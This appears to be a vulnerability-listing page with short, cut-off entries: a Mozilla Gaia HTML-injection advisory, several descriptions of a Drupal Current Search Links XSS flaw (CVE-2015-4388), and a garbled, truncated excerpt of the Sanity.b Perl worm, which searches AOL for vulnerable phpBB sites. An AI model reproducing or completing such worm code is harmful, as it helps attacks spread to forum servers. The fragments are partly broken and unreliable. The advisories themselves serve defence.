EUVD-2015-4411

Malware in sbrugna...

Remote HTML tag injection in Gaia System app — Mozilla

Security researcher Muneaki Nishimura reported an issue with Gaia's System app which allows an attacker to inject HTML code into the System app's context via specially-crafted search links. The injection occurs when the user opens such malicious link in the browser and then presses the HOME butto...

CVE-2015-4388

Cross-site scripting XSS vulnerability in the Current Search Links module 7.x-1.x before 7.x-1.1 for Drupal, when the "Append the keywords passed by the user to the list" option is disabled, allows remote attackers to inject arbitrary web script or HTML via a crafted search query...

CVE-2015-4388

CVE-2015-4388 affects Drupal’s contributed Current Search Links module (7.x-1.x) before 7.x-1.1. The vulnerability arises when the option "Append the keywords passed by the user to the list" is disabled, leaving the module unable to adequately sanitize the user’s search query. This allows remote ...

Drupal Current Search Links Module Cross-Site Scripting Vulnerability

Drupal is a free and open source content management system developed in PHP. A cross-site scripting vulnerability exists in Drupal Current Search Links, which allows remote attackers to exploit the vulnerability to inject malicious script or HTML code, which can be used to obtain sensitive...

Sanity.b - phpBB 2.0.10 Bot Install (AOL/Yahoo Search)

/usr/bin/perl use IO::Socket; use LWP::Simple; @vul = ""; $a=0; $numero = int rand999; $site = "search.aol.com"; $procura = "viewtopic.php%3Ft%3D$numero"; for$n=0;$nnewPeerAddr="$site",PeerPort="80",Proto="tcp" or next; print $sock "GET /aolcom/search?q=$procura&Stage=0&page=$n HTTP/1.0\n\n"; @re...